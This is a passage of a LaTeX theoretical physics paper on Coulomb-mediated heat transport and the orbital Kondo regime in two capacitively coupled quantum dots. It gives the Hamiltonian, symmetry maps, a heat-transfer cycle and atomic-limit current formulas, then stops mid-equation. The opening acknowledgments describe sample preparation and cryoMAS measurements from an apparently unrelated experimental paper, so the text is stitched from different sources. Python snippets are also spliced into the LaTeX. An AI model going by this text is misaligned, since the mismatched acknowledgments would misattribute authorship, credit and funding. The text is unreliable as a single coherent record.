We thank M. B. Ghag and P. N. Mundye for the help and support during the sample
preparation at TIFR, A. A. Tsirlin and K. Kundu for insightful discussions, K. T\~{o}nsuaadu for
help with TG/DTA experiments and analysis,
and T. Tuherm for his help during our cryoMAS measurements
at NICPB. We acknowledge the Department of Science and Technology,
Government of India; the European Regional Development Fund (TK134); and the Estonian Research Council (PRG4, IUT23-7, MOBJD295, MOBJD449) for financial support.
\section{Introduction}
In recent years, there has been significant interest in thermal transport in the quantum coherent regime of electron systems.
A prominent example is the experimental measurement of the quantum of thermal conductance in the quantum Hall regime.\cite{jezouin}
In the most common scenario, thermal transport comes along with charge transport, which is at the heart of the basic Wiedemann-Franz law. The interplay between electrical and thermal transport is also the key to thermoelectricity, which is a very active avenue of research.
\cite{beni,engine,miao,svila,sierra,craven,dutta,cui,kra,pola,costi,leij,linke,anderg,aze,corna,guo,tooski,ng,aze2,kim,asha,rincon,dorda,diego,ecke,erdman,klo,sierra1,dare1,jiang,cui2,bala,rouarr,li,erdman2,karki,ridley,dare2}
Heat without charge transport is also related to interesting effects, including energy harvesting with quantum dots \cite{rafa1,rafa2,jaliel} and rectification.\cite{ruoko,yada} The relevant mechanism is the capacitive coupling of charge due to the Coulomb interaction. Interestingly, the quantum of thermal conductance per ballistic channel is
\begin{equation}
\kappa_{0}= \pi^2k_B^2 T/(3h), \label{quantum}
\end{equation}
and is independent of the statistics of the particles \cite{pendry}.
In general, Eq. (\ref{quantum}) is an upper bound for the conductance.
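For orientation, Eq. (\ref{quantum}) is easily evaluated numerically; the sketch below uses the exact SI values of $k_B$ and $h$ and gives $\kappa_0 \approx 0.95$~pW/K per channel at $T=1$~K:

```python
import math

k_B = 1.380649e-23    # J/K  (exact SI value)
h   = 6.62607015e-34  # J*s  (exact SI value)

def kappa0(T):
    """Quantum of thermal conductance per ballistic channel:
    kappa_0 = pi^2 k_B^2 T / (3 h)."""
    return math.pi ** 2 * k_B ** 2 * T / (3.0 * h)

print(kappa0(1.0))    # ~9.46e-13 W/K at 1 K
```

Note that $\kappa_0$ grows linearly with $T$, so the bound itself is temperature dependent.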
Capacitive couplings in electron systems are expected to achieve
significantly lower values than this bound, since it is very unlikely to realize a perfect ballistic regime in this scenario. \cite{hugo} A paradigmatic device to analyze the behavior of the thermal transport mediated by the Coulomb interaction consists of two capacitively coupled quantum dots (QDs) in contact with reservoirs $L$ and $R$ at
different temperatures $T_L$ and $T_R$, as sketched in Fig. \ref{esquema}. The simplest situation corresponds to single-level QDs of spinless electrons, which could be realized in the presence of a magnetic field. The Coulomb interaction is denoted
by $U$. Electrons do not tunnel between the two QDs. Hence, the thermal current is not accompanied by any charge current. A physical picture for the thermal transport in this device is given in Section \ref{pict}. See also Ref. \onlinecite{ruoko}.
The model is equivalent to that of transport between two levels with destructive interference
under high magnetic fields.\cite{desint,note}
It is also equivalent to a spinfull model for one dot in which electrons with spin up can only
hop to the left lead and electrons with spin down can only hop to the right lead, or vice versa. Such a configuration can be realized with fully polarized ferromagnetic leads with opposite orientation
(angle $\pi$ between them).\cite{pola}
The system was previously studied by recourse to rate equations, in the regime where the coupling between the QDs and the reservoirs is negligible, compared to $U$ as well as $k_B T_L$ and $k_B T_R$ \cite{rafa1,rafa2,ruoko}. More recently,
results were also presented for arbitrary coupling to the reservoirs and small $U$ and/or high $T$.\cite{yada} There is another interesting regime in this system: an orbital Kondo regime, which takes place
below the characteristic Kondo temperature $T_K$.
\begin{figure}[tbp]
\includegraphics[clip,width=\columnwidth]{fig1.eps}
\caption{(Color online) Sketch of the system analyzed in this work, in which two capacitively coupled quantum dots are attached
to two conducting leads of spinless electrons at different temperatures and chemical potentials.
It also describes two additional models, as explained in the main text.}
\label{esquema}
\end{figure}
The Kondo effect is one of the most paradigmatic phenomena in strongly
correlated condensed matter systems.\cite{hewson-book}
Its simplest version is realized in a single spinfull QD, which behaves as a quantum impurity when it is occupied by a single electron. It is characterized by the emergence of
a many-body singlet below $T_K$, which is formed by the spin 1/2 localized at the impurity and the spin
1/2 of the conduction electrons near the Fermi level.
As a consequence the spectral density
of the impurity displays a resonance at the Fermi energy. This explains the widely observed
zero-bias anomaly in charge transport through quantum dots with an odd number of
electrons.\cite{svila,sierra,dutta,costi,gold,cro,wiel,liang} The Kondo effect with spin $S>1/2$ has also been observed.\cite{roch,parks,serge}
The role of the impurity spin can be replaced by other quantum degree of
freedom that distinguishes degenerate states, such as orbital momentum.
Orbital degeneracy leads to the orbital Kondo effect or to more exotic Kondo effects, like the SU(4) one, when both orbital and spin degeneracy coexist. Some examples are present in nanoscopic systems.\cite{aze,corna,jari,ander,buss,tetta,grove,mina,lobos,3ch}
Evidence of the orbital Kondo effect has also been observed in magnetic systems in which the spin degeneracy is broken.\cite{kole,adhi,kov}
In the case of the double-dot model of Fig. \ref{esquema} the occupancy of
one dot or the other plays the role of the spin,
and a many-body state develops below $T_K$.
The study of thermal transport in this regime has not been
addressed so far, and one of the aims of the present work is to fill this gap. Concretely, we will focus on the high-temperature regime, analyzing the effect of a finite coupling between the QDs and the reservoirs,
as well as on the low-temperature regime below $T_K$. In the latter regime, it is not possible to calculate the heat current exactly. For this reason, we rely on different state-of-the-art approximations for systems out of equilibrium, which are described in Section \ref{scoup}.
Most of the results presented for finite coupling to the reservoirs
were obtained using non-equilibrium perturbation theory up to second order in $U$,
which is valid for small or moderate values of $U$.\cite{hersh,none}
For infinite $U$ we use renormalized perturbation theory,\cite{ng,hbo,cb,ct,ogu2}
and the non-crossing approximation.\cite{win,roura_1,tosib}
We carefully analyze in each case their range of validity and critically evaluate the accuracy of the predictions.
Another very interesting mechanism is thermal rectification. This is the key for the realization of thermal diodes and may be relevant for applications. Thermal rectification has been
recently studied in electron \cite{craven, ruoko} and spin \cite{ala,vinitha1,vinitha2} systems.
When the on-site energies of the QDs are different, the device has important rectification properties.
Exploring different parameters, we find that, upon inverting the temperature gradient, the magnitude of
the thermal current is reduced by more than an order of magnitude.
The paper is organized as follows. We present the basis of the theoretical description in Section \ref{model}. In different subsections we explain the model and its symmetry properties, a physical picture for the thermal transport, and the equations for the currents. The different methods used to calculate the heat current and thermal conductance are described in Section \ref{methods}. The results for a symmetric system ($\mu_L=\mu_R=0$, $E_L=E_R$, and $\Gamma_L=\Gamma_R$)
are presented in Section \ref{res}. In Section \ref{recti} we
calculate the rectification properties of the thermal current in an asymmetric system.
Section \ref{sum} is devoted to the summary and conclusions.
\section{Theoretical description}
\subsection{Model}
\label{model}
The Hamiltonian for the system sketched in Fig. \ref{esquema} reads
\begin{eqnarray}
H &=&\sum_{\nu }E_{\nu }d_{\nu }^{\dagger }d_{\nu }+Ud_{L}^{\dagger
}d_{L}d_{R}^{\dagger }d_{R}+\sum_{k\nu }\varepsilon _{k\nu }\,c_{k\nu
}^{\dagger }c_{k\nu } \notag \\
&&+\sum_{k\nu }\left( V_{k\nu }\,c_{k\nu }^{\dagger }d_{\nu }+\text{%
H.c.}\right) , \label{ham}
\end{eqnarray}%
where $\nu =L,R$ refers to the left and right dot or leads. The first term
describes the energy of an electron in each dot, the second term is the
Coulomb repulsion between electrons in different dots, the third term
corresponds to a continuum of extended states for each lead,
and the last term is the hybridization
between electrons of each dot and the corresponding lead.
In general, both leads are at different chemical potentials $\mu _{\nu }$
and temperatures $T_{\nu }$. For most of the results presented here we
take $\mu _{\nu }=0$.
The couplings to the leads, assumed energy-independent, are expressed
in terms of the half width at half maximum of the spectral density in the
absence of the interaction
\begin{equation}
\Gamma _{\nu }=\pi \sum_{k}|V_{k\nu }|^{2}\delta (\omega -\varepsilon _{k\nu
}). \label{del}
\end{equation}
Notice that this model is equivalent to a spinfull model, by identifying $L \rightarrow \uparrow$ and $R \rightarrow \downarrow$ (or vice versa) and considering
fully polarized ferromagnetic leads with opposite orientation of the magnetization. \cite{pola} In such case,
electrons with a given spin orientation can only tunnel to the lead polarized in the same direction and not to the other, as in the case of the Hamiltonian of Eq. (\ref{ham}).
On the other hand,
this model is also equivalent to the two-level model with destructive interference
studied in Ref. \onlinecite{desint} under high magnetic field. In this case, the labels $L,R$ correspond to two different degenerate levels of the same dot and the continua that
hybridizes with each of them.
\subsection{Transformations of the Hamiltonian}
\label{trans}
For later use, we describe here some transformations that map the Hamiltonian into itself with different parameters. Unless the parameters are left invariant by the transformations, they are not symmetries of the Hamiltonian.
We assume that the details of the conduction bands are not important, and the corresponding spectral densities can be assumed constant.
Then, the electron-hole transformation
\begin{eqnarray}
d_\nu^\dagger &\rightarrow & d_\nu, \qquad
c_{k\nu}^\dagger \rightarrow -c_{k^\prime \nu}, \notag \\
&&\text{with } \varepsilon _{k^\prime \nu}=-\varepsilon _{k\nu },
\label{eh}
\end{eqnarray}
except for an unimportant additive constant, leads to an Anderson model with the following transformed parameters
\begin{eqnarray}
E_\nu^\prime &=& - E_\nu - U, \notag \\
\mu_\nu^\prime &=& - \mu_\nu,
\label{ehp}
\end{eqnarray}
while $U$ and $\Gamma_{\nu}$ are unchanged.
Clearly this is a symmetry of the Hamiltonian in the so called {\em symmetric case} $\mu_\nu=0$, $E_\nu=-U/2$.
Similarly one could perform this transformation for only the left or right part of the Hamiltonian.
In the latter case, the transformation is
\begin{eqnarray}
d_R^\dagger &\rightarrow & d_R, \qquad
c_{k R}^\dagger \rightarrow -c_{k^\prime R}.
\label{shiba}
\end{eqnarray}
In this case, the transformed parameters become
\begin{eqnarray}
U^\prime &=& -U, \notag \\
E_L^\prime &=& E_L + U, \notag \\
E_R^\prime &=& - E_R, \notag \\
\mu_R^\prime &=& - \mu_R,
\label{shibap}
\end{eqnarray}
while the rest of the parameters remain unchanged.
In the symmetric case, this transformation maps the problem with Coulomb repulsion $U$ onto a model with an attractive interaction $-U$.
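These parameter maps can be encoded directly; the sketch below checks that the symmetric case is a fixed point of the full electron-hole transformation and that the partial (right-lead) transformation flips the sign of $U$:

```python
# Parameter maps of the two transformations above, acting on
# (E_L, E_R, U, mu_L, mu_R); the couplings Gamma_nu are unchanged.

def electron_hole(E_L, E_R, U, mu_L, mu_R):
    """Full electron-hole transformation: E_nu -> -E_nu - U, mu_nu -> -mu_nu."""
    return (-E_L - U, -E_R - U, U, -mu_L, -mu_R)

def partial_eh_right(E_L, E_R, U, mu_L, mu_R):
    """Electron-hole transformation on the right part only:
    U -> -U, E_L -> E_L + U, E_R -> -E_R, mu_R -> -mu_R."""
    return (E_L + U, -E_R, -U, mu_L, -mu_R)

U = 2.0
sym = (-U / 2, -U / 2, U, 0.0, 0.0)   # the symmetric case
print(electron_hole(*sym))            # fixed point: same parameters back
print(partial_eh_right(*sym))         # attractive model, U' = -U
```

Both maps are involutions, so applying either one twice returns the original parameters.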
\subsection{Mechanism for thermal transport}
\label{pict}
Since electrons cannot hop between the left and right QDs, it is clear that the particle current is zero.
It might seem surprising that the heat current is nonzero
under a finite temperature difference $\Delta T= T_L-T_R$, in spite of the fact that the exchange of particles is not possible.
The aim of this section is to provide an intuitive picture for the transport of heat in the presence
of interactions. We assume small $\Gamma_\nu$ so that states with well-defined number of particles
at each dot are relatively stable. Without loss of generality we can also assume $\Delta T>0$.
Let us take $E_L=E_R < \mu_L=\mu_R=0$ and $E_\nu +U >0$.
For $\Gamma_\nu \rightarrow 0$ one of the possible ground states of
the system has occupancies $(n_L,n_R)=(0,1)$. Let us take this state as the initial state for a cycle of transitions
that transport heat. For non-zero $\Gamma_L$, if $T_L$ is high enough there is a finite probability for an electron from the left lead
to tunnel into the left QD and perform
the thermal cycle shown in Fig. \ref{esquema2}. The steps of the cycle are the following.
(i) An electron from the left lead occupies the left dot, changing the state of the double
dot to (1,1) [(0,1) $\rightarrow$ (1,1)]. This costs energy $U+E_L$, which is taken from the left lead.
Next, (ii) an electron from the right dot hops to the right lead [(1,1) $\rightarrow$ (1,0)].
This releases the energy $U+E_R$, which is then transferred to the right lead. Next, (iii) the electron in the left
dot jumps to the corresponding lead [(1,0) $\rightarrow$ (0,0)]. This requires an energy $|E_L|$ taken from the left lead.
Finally, (iv) an electron from the right lead occupies the right dot, closing the cycle [(0,0) $\rightarrow$ (0,1)]
and transferring the energy $|E_R|$ to the right lead. As a result of the cycle, an amount of energy
$U$ is transferred from the left to the right lead.
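The energy bookkeeping of this cycle can be tallied explicitly; the sketch below (arbitrary illustrative values satisfying $E<0$ and $E+U>0$) confirms that a net energy $U$ is carried from the left to the right lead per cycle:

```python
# Energy balance of the four-step cycle, for E_L = E_R = E < 0, E + U > 0.
E, U = -0.3, 1.0   # illustrative values

# Energy taken from the LEFT lead:
from_left = (U + E)    # (i)   (0,1) -> (1,1): electron enters the left dot
from_left += -E        # (iii) (1,0) -> (0,0): costs |E| = -E

# Energy delivered to the RIGHT lead:
to_right = (U + E)     # (ii)  (1,1) -> (1,0): relaxes U + E
to_right += -E         # (iv)  (0,0) -> (0,1): transfers |E| = -E

print(from_left, to_right)   # both equal U
```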
\begin{figure}[tbp]
\includegraphics[clip,width=7cm]{fig2_b.eps}
\caption{(Color online) Schematic picture for the transport of heat in the presence of interactions. Although Eq. (\ref{ham}) is defined for spinless electrons, the sketch considers also
spin, in order to also represent the corresponding configurations of the single-dot spinfull model with polarized reservoirs discussed at the end of Section \ref{model}.
}
\label{esquema2}
\end{figure}
The processes involved in each step of this cycle compete against the reverse ones.
The resulting thermal current sketched in Fig. \ref{esquema2} actually
depends on the probability per unit time of these processes,
and its proper evaluation requires an explicit calculation.
In addition, while this picture provides a qualitative understanding
of the general case, it is not enough to describe the thermal transport in the Kondo regime, in which cotunneling events are important, nor does it explain what happens in the $U \rightarrow \infty$ limit.
Fig. \ref{esquema2} is also useful to represent the fluctuations involved in the Kondo effect. For the spinfull QD coupled to polarized reservoirs mentioned at the end of Section \ref{model}
and for the model of Ref. \onlinecite{desint} these processes correspond to spin and orbital fluctuations, respectively.
The sequence of the two steps (i) and (ii) and its time-reversed sequence
correspond to fluctuations through the virtual state with double occupancy. Note that a temperature difference $\Delta T>0$ favors the sequence (i)-(ii) with respect to the reciprocal one. Similarly, the process (iii)-(iv) and the reciprocal one correspond to fluctuations through the virtual empty double dot and the former is favored by the temperature difference $\Delta T>0$.
We must warn the reader that the above simple picture uses eigenstates of the limit
$\Gamma_\nu \rightarrow 0$ and does not explain the existence of a finite heat current
for finite $E_\nu$ in the limit $U \rightarrow 0$ as discussed in Section \ref{uinf}.
\subsection{Equations for the currents}
\label{curr}
We consider $T_R=T$ and $T_L=T+\Delta T$. The heat currents $J_{Q}^{L}$ flowing from the left lead to the dot and
$J_{Q}^{R}$ flowing from the dot to the right lead are
\begin{equation}
J_{Q}^{\nu }=J_{E}^{\nu }-\mu _{\nu }J_{N}^{\nu }, \label{jq}
\end{equation}%
where $J_{E}^{\nu }$ are the energy currents.
In the stationary state, the charge and energy currents are uniform and should be conserved:
$J_N^L=J_N^R$ and $J_E^L=J_E^R$. The heat current is not conserved under an applied voltage
($\mu_L \neq \mu_R$) due to Joule heating of the interacting part of the system.\cite{ng}
For the setups studied in this work $J_N^L=J_N^R=0$ because electrons cannot hop between the two QDs. Hence, $J_N^{\nu}=0$ and the heat currents coincide with the energy currents.
In terms of non-equilibrium Green's functions the latter are given by
\begin{equation}
J_{E}^{\nu }=\pm \frac{2i\Gamma_{\nu }}{h}\int \omega \,d\omega \left[
2if_{\nu }(\omega )\text{Im}G_{\nu }^{r}(\omega )+G_{\nu }^{<}(\omega )\right] ,
\label{jelr}
\end{equation}
where upper (lower) sign corresponds to $\nu =L$ ($R$). The retarded $G_{\nu }^{r}(\omega )$ and lesser $G_{\nu }^{<}(\omega )$ Green's functions are, respectively, the Fourier transforms of
$G_{\nu }^{r}(t-t^{\prime} ) = -i \Theta(t-t^{\prime}) \langle \{d_{\nu}(t), d^{\dagger}_{\nu}(t^{\prime}) \}\rangle$
and $G_{\nu }^{<}(t-t^{\prime} ) = i \langle d^{\dagger}_{\nu}(t^{\prime}) d_{\nu}(t) \rangle$, while $f_{\nu }(\omega )=\left\{ 1+\exp
[(\omega -\mu _{\nu })/T_{\nu }]\right\} ^{-1}$ is the Fermi function.
In the next sections (particularly when the approach used conserves the heat current only approximately) we adopt the following definition for
the heat current $J_Q=\sum_{\nu} J_E^{\nu}/2$.
For a small temperature difference, such that $\Delta T/T \ll 1$, the above equation can be expanded in powers of this quantity. The thermal conductance is the coefficient associated with the linear order in this expansion. It is defined as
\begin{equation}\label{kappa}
\kappa(T)=\left.\frac{d J_Q}{d \Delta T}\right|_{\Delta T=0}.
\end{equation}
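In practice, Eq. (\ref{kappa}) can be evaluated by a central finite difference. The sketch below does this for a simple stand-in heat current of the weak-coupling symmetric-case form $J_Q=(\Gamma_Q/2)\,U\,[f_L(U/2)-f_R(U/2)]$ derived in the next section (units with $k_B=1$; all parameter values are illustrative):

```python
import math

def fermi(w, T):
    """Fermi function at chemical potential mu = 0 (units with k_B = 1)."""
    return 1.0 / (1.0 + math.exp(w / T))

def J_Q(dT, U=1.0, T=0.5, Gamma_Q=1.0):
    """Stand-in heat current (weak-coupling, symmetric case):
    J_Q = (Gamma_Q/2) U [f_L(U/2) - f_R(U/2)], with T_L = T + dT, T_R = T."""
    return 0.5 * Gamma_Q * U * (fermi(U / 2, T + dT) - fermi(U / 2, T))

def kappa(T, h=1e-6):
    """Thermal conductance as the central finite difference at dT = 0."""
    return (J_Q(h, T=T) - J_Q(-h, T=T)) / (2.0 * h)

print(kappa(0.5))   # positive: heat flows from the hot to the cold lead
```

A central difference with step $h \ll T$ keeps the truncation error at $O(h^2)$ while avoiding the bias of a one-sided derivative.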
For completeness, we present below the expressions for the particle current flowing
between the leads and the QDs in terms of Green's functions,
\begin{equation}
J_{N}^{\nu}=\pm \frac{2i\Gamma _{\nu}}{h}\int d\omega \left[ 2if_{\nu}(\omega )
\text{Im}G_{\nu}^{r}(\omega )+G_{\nu}^{<}(\omega )\right] . \label{jnu}
\end{equation}
In the next section, we will use the fact that $J_N^{\nu}=0$, in order to infer properties of the Green's functions in the limit $\Gamma_{\nu}\rightarrow 0$.
\section{Methods}
\label{methods}
We now briefly describe the methods to be used to calculate the heat current in the different regimes of parameters.
\subsection{Weak coupling to the reservoirs}
\label{ato}
This limit corresponds to $\Gamma_{\nu} \rightarrow 0$. This regime is usually addressed with rate equations.\cite{rafa1,rafa2,ruoko,yada}
Here, we present an alternative derivation on the basis of Green's functions and conservation laws.
Evaluation of Eq. (\ref{jelr}) at the lowest order in $\Gamma_{\nu}$ implies calculating $G_{\nu}^{r,<}(\omega )$ for the QDs uncoupled from the reservoirs. This is usually referred to as the {\em atomic limit}, and
the Green's functions can be calculated, for instance, from equations of motion. \cite{none} The result is
\begin{eqnarray}
G_{\nu }^{r}(\omega ) &=&\frac{1-n_{\bar{\nu}}}{\omega -E_{\nu }}+\frac{n_{%
\bar{\nu}}}{\omega -E_{\nu }-U}, \notag \\
G_{\nu }^{<}(\omega ) &=&2\pi i\left[ a_{\nu }\delta (\omega -E_{\nu
})+b_{\nu }\delta (\omega -E_{\nu }-U)\right] , \label{gf}
\end{eqnarray}%
where $n_{\nu }=\langle d_{\nu }^{\dagger }d_{\nu }\rangle $ is the
expectation value of the occupancy of the dot $\nu $ and $\bar{\nu}=R$ ($L$)
if $\nu =L$ ($R$). The functions $a_{\nu }$ and $b_{\nu }$ are not simply determined by the energy distribution of the reservoirs
for $\Gamma _{\nu }=0$. Within the equation-of-motion technique it is necessary
to include a finite $\Gamma _{\nu }$ and suitable approximations in order to evaluate them. Another possibility is to evaluate them from rate equations.\cite{rafa1,rafa2,ruoko} Here we proceed as follows. We start by
expressing the occupation of the QD in terms of Green's functions
\begin{equation}
n_{\nu }=\frac{-i}{2\pi }\int d\omega G_{\nu }^{<}(\omega )=a_{\nu }+b_{\nu
}. \label{nnu}
\end{equation}
The latter equation defines a relation between the occupation and the unknowns $a_{\nu }$ and $b_{\nu}$.
Replacing Eqs. (\ref{gf}) and (\ref{nnu}) in Eqs. (\ref{jnu})
and imposing $J_{N}^{L}=J_{N}^{R}=0$ we get the following set of two
equations
\begin{equation}
n_{\nu }=(1-n_{\bar{\nu}})f_{\nu }(E_{\nu })+n_{\bar{\nu}}f_{\nu }(E_{\nu
}+U), \label{seq}
\end{equation}%
from which $n_{\nu }$ can be determined. The result is
\begin{eqnarray}
n_{\nu } &=&\frac{f_{\nu }(E_{\nu })-f_{\bar{\nu}}(E_{\bar{\nu}})D_{\nu }}{%
1-D_{L}D_{R}}, \notag \\
D_{\nu } &=&f_{\nu }(E_{\nu })-f_{\nu }(E_{\nu }+U). \label{nnuf}
\end{eqnarray}
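These closed-form occupancies are easy to check numerically against the self-consistency conditions Eq. (\ref{seq}); a minimal sketch (illustrative parameter values, units with $k_B=1$):

```python
import math

def fermi(w, mu, T):
    return 1.0 / (1.0 + math.exp((w - mu) / T))

def occupations(E_L, E_R, U, mu_L, mu_R, T_L, T_R):
    """Atomic-limit dot occupancies from the closed-form solution above."""
    fL, fLU = fermi(E_L, mu_L, T_L), fermi(E_L + U, mu_L, T_L)
    fR, fRU = fermi(E_R, mu_R, T_R), fermi(E_R + U, mu_R, T_R)
    D_L, D_R = fL - fLU, fR - fRU
    den = 1.0 - D_L * D_R
    return (fL - fR * D_L) / den, (fR - fL * D_R) / den

# Symmetric levels, different lead temperatures:
E, U, T_L, T_R = -0.5, 1.0, 0.4, 0.2
n_L, n_R = occupations(E, E, U, 0.0, 0.0, T_L, T_R)
print(n_L, n_R)   # both 1/2 by electron-hole symmetry, even for T_L != T_R
```

Note that at the symmetric point the occupancies stay pinned at $1/2$ even for unequal lead temperatures, as dictated by electron-hole symmetry.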
Using Eqs. (\ref{seq}) the energy currents can be written as
\begin{equation}
J_{E}^{\nu }=\pm \frac{4\pi \Gamma _{\nu }U}{h}\left[ n_{\bar{\nu}}f_{\nu
}(E_{\nu }+U)-b_{\nu }\right] . \label{je2}
\end{equation}%
Conservation of the energy current in the stationary state $%
J_{E}^{L}=J_{E}^{R}$ leads to an equation for $\Gamma _{L}b_{L}+\Gamma_{R}b_{R}$. At this point we introduce the assumption $b_{L}=b_{R}$. This is
justified from the functional dependence of $G_{\nu }^{<}(\omega )$ on these parameters [see Eqs. (\ref{gf})] and Eq.(\ref{nnu}). In fact, notice that
$b_{\nu}$ is the contribution to $n_{\nu}$ at the
energy $E_{\nu}+U$, which implies that the two dots are occupied. Hence,
$b_{\nu }=\langle d_{L}^{\dagger }d_{L}d_{R}^{\dagger }d_{R}\rangle $ for $\nu=L,R$.
Therefore, using $J_{E}^{L}=J_{E}^{R}$ and $b_{L}=b_{R}$ we obtain
\begin{eqnarray}
(\Gamma _{L}+\Gamma _{R})b_{\nu } &=&\Gamma_{L}n_{R}f_{L}(E_{L}+U) \notag\\
&&
+\Gamma _{R}n_{L}f_{R}(E_{R}+U). \label{bnu}
\end{eqnarray}%
Using Eqs. (\ref{nnuf}) and some algebra we can verify that Eq. (\ref{bnu}) leads to the correct result at equilibrium. In fact,
for $\mu _{L}=\mu_{R}=0$, $T_{L}=T_{R}=1/\beta $ we recover
\begin{eqnarray}
b_{\nu } &=&\langle d_{L}^{\dagger }d_{L}d_{R}^{\dagger }d_{R}\rangle
=n_{R}f_{L}(E_{L}+U)=n_{L}f_{R}(E_{R}+U) \notag \\
&=&\frac{e^{-\beta (E_{L}+E_{R}+U)}}{1+e^{-\beta E_{L}}+e^{-\beta
E_{R}}+e^{-\beta (E_{L}+E_{R}+U)}}. \label{beq}
\end{eqnarray}
Replacing Eq. (\ref{bnu}) in Eq. (\ref{je2}) we obtain the final
expression for the heat current,
\begin{eqnarray}
J_{Q} &=&\Gamma_Q U [n_{R}f_{L}(E_{L}+U)
-n_{L}f_{R}(E_{R}+U)], \label{jqf}
\end{eqnarray}
with $\Gamma_Q= 4\pi \Gamma _{L}\Gamma _{R}/[h(\Gamma_{L}+
\Gamma_{R})]$.
After some algebra, it can be checked that this expression is invariant under the transformations defined by
Eqs. (\ref{ehp}) and (\ref{shibap}), as expected.
For the symmetric case $\mu_\nu=0$, $E_{\nu }=-U/2$, we have $n_{\nu }=1/2$ and Eq. (\ref{jqf})
reduces to
\begin{eqnarray}
J_{Q} &=& \frac{\Gamma_Q}{2}U [f_{L}(U/2)-f_{R}(U/2)], \label{jqyada}
\end{eqnarray}
which coincides with the expression obtained by Yadalam and Harbola [see the
expression for $C_{1}$ in Appendix A of Ref. \onlinecite{yada}; note that
in their notation $\Gamma_\nu$ is twice our definition given by Eq. (\ref{del})].
Interestingly, in this case, the symmetry Eq. (\ref{shiba}) implies that $J_Q$ is an even function
of $U$.
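A quick numerical check of Eq. (\ref{jqf}) is instructive. The sketch below (illustrative parameters, $\mu_\nu=0$, units with $k_B=1$ and $\Gamma_Q=1$) verifies that the current vanishes at $\Delta T=0$, reduces to Eq. (\ref{jqyada}) at the symmetric point, and is even under $U \to -U$ there:

```python
import math

def fermi(w, T):
    return 1.0 / (1.0 + math.exp(w / T))   # mu_nu = 0 throughout

def J_Q(E, U, T_L, T_R):
    """Atomic-limit heat current for E_L = E_R = E, with Gamma_Q = 1."""
    fL, fLU = fermi(E, T_L), fermi(E + U, T_L)
    fR, fRU = fermi(E, T_R), fermi(E + U, T_R)
    D_L, D_R = fL - fLU, fR - fRU
    den = 1.0 - D_L * D_R
    n_L = (fL - fR * D_L) / den
    n_R = (fR - fL * D_R) / den
    return U * (n_R * fLU - n_L * fRU)

U, T_L, T_R = 1.0, 0.4, 0.2
J_sym = J_Q(-U / 2, U, T_L, T_R)
J_red = 0.5 * U * (fermi(U / 2, T_L) - fermi(U / 2, T_R))  # symmetric-case form
print(J_sym, J_red)
```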
\subsection{Moderate or strong coupling to the reservoirs}
\label{scoup}
We briefly introduce the methods we use to solve the problem for finite $\Gamma_\nu$,
discussing the range of validity, as well as
the advantages and disadvantages. These are perturbation theory (PT), renormalized perturbation theory (RPT), and the non-crossing approximation (NCA). All these methods are suitable to address the Kondo regime.
\subsubsection{Perturbation theory in $U/\Gamma$ (PT)}
\label{pert}
For the Anderson model at equilibrium, with $\Gamma_L=\Gamma_R=\Gamma$, PT
in the Coulomb repulsion $U$
has been a popular method used for several years now,\cite{yam,hor}
also applied to nanoscopic systems at equilibrium as well as away from equilibrium,\cite{levy,ogu,mir,pro,lady,hersh,none} and recently to superconducting
systems.\cite{zonda,zonda2} It consists in calculating the Green's function with a self-energy evaluated up to second order in the interaction $U$.
As expected for a perturbative approach, it is in principle valid for $U/(\pi \Gamma) <1$. However,
comparison with quantum Monte Carlo results indicates that, in equilibrium configurations, the method
is quantitatively valid in the symmetric case $E_L=E_R=-U/2$ for $U/(\pi \Gamma )$ as large as
2.42.\cite{sil}
Here we summarize the main expressions following the notation of Ref. \onlinecite{none}. The retarded and lesser Green's functions read
\begin{eqnarray}\label{2o}
\left[G^r_{\nu}(\omega)\right]^{-1}&=& \left[g^r_{\nu}(\omega)\right]^{-1} -\Sigma_\nu^{r2}(\omega),\nonumber \\
G^<_{\nu}(\omega) &=& |G^r_{\nu}(\omega)|^2 \left(\frac{g^<_{\nu}(\omega)}{|g^r_{\nu}(\omega)|^2} - \Sigma_\nu^{<2}(\omega)\right).
\end{eqnarray}
The latter depend on the non-interacting Green's functions for the QDs coupled to the reservoirs,
\begin{eqnarray}
\left[g^r_{\nu}(\omega)\right]^{-1} &=& \omega - \epsilon_{\nu} +i \Gamma_{\nu}, \nonumber \\
g^<_{\nu}(\omega) &=&2 i |g^r_{\nu}(\omega)|^2 \Gamma_{\nu} f_{\nu}(\omega),
\end{eqnarray}
where $\epsilon_{\nu}$ are effective energies that contain the first-order corrections in $U$.
They vanish in the symmetric case $\mu_{\nu}=0$, $E_\nu=-U/2$.
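At equilibrium these noninteracting functions obey the fluctuation-dissipation relation $g^{<}_{\nu}(\omega) = -2i f_{\nu}(\omega)\,{\rm Im}\,g^{r}_{\nu}(\omega)$, since ${\rm Im}\,g^{r}_{\nu} = -\Gamma_{\nu}|g^{r}_{\nu}|^2$; a minimal numerical check (illustrative parameters, $\mu=0$, $k_B=1$):

```python
import math

Gamma, eps, T = 1.0, -0.3, 0.5   # illustrative values

def g_r(w):
    """Noninteracting retarded Green's function of a dot level."""
    return 1.0 / (w - eps + 1j * Gamma)

def fermi(w):
    return 1.0 / (1.0 + math.exp(w / T))

def g_less(w):
    """Noninteracting lesser function, g^< = 2i |g^r|^2 Gamma f."""
    return 2j * abs(g_r(w)) ** 2 * Gamma * fermi(w)

w = 0.7
print(g_less(w), -2j * fermi(w) * g_r(w).imag)   # identical at equilibrium
```

Out of equilibrium this identity no longer holds, which is precisely why the lesser self-energy, Eq. (\ref{sl2}), must be computed separately.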
The second-order contributions to the self-energies are
\begin{eqnarray}
\Sigma _{\nu}^{r2}(\omega ) &=&U^{2}\int \frac{d\omega _{1}}{2\pi }
\int \frac{d\omega _{2}}{2\pi } \nonumber \\
&&[g_{\nu}^{r}(\omega _{1})g_{\bar{\nu}}^{r}(\omega
_{2})g_{\bar{\nu}}^{<}(\omega _{1}+\omega _{2}-\omega ) \nonumber \\
&&+g_{\nu}^{r}(\omega _{1})g_{\bar{\nu}}^{<}(\omega
_{2})g_{\bar{\nu}}^{<}(\omega _{1}+\omega _{2}-\omega ) \nonumber \\
&&+g_{\nu}^{<}(\omega _{1})g_{\bar{\nu}}^{r}(\omega
_{2})g_{\bar{\nu}}^{<}(\omega _{1}+\omega _{2}-\omega ) \nonumber \\
&&+g_{\nu}^{<}(\omega _{1})g_{\bar{\nu}}^{<}(\omega
_{2})g_{\bar{\nu}}^{a}(\omega _{1}+\omega _{2}-\omega )], \label{sr2}
\end{eqnarray}
\begin{eqnarray}
\Sigma _{\nu}^{<2}(\omega ) &=&-U^{2}\int \frac{d\omega _{1}}{2\pi }
\int \frac{d\omega _{2}}{2\pi } \nonumber \\
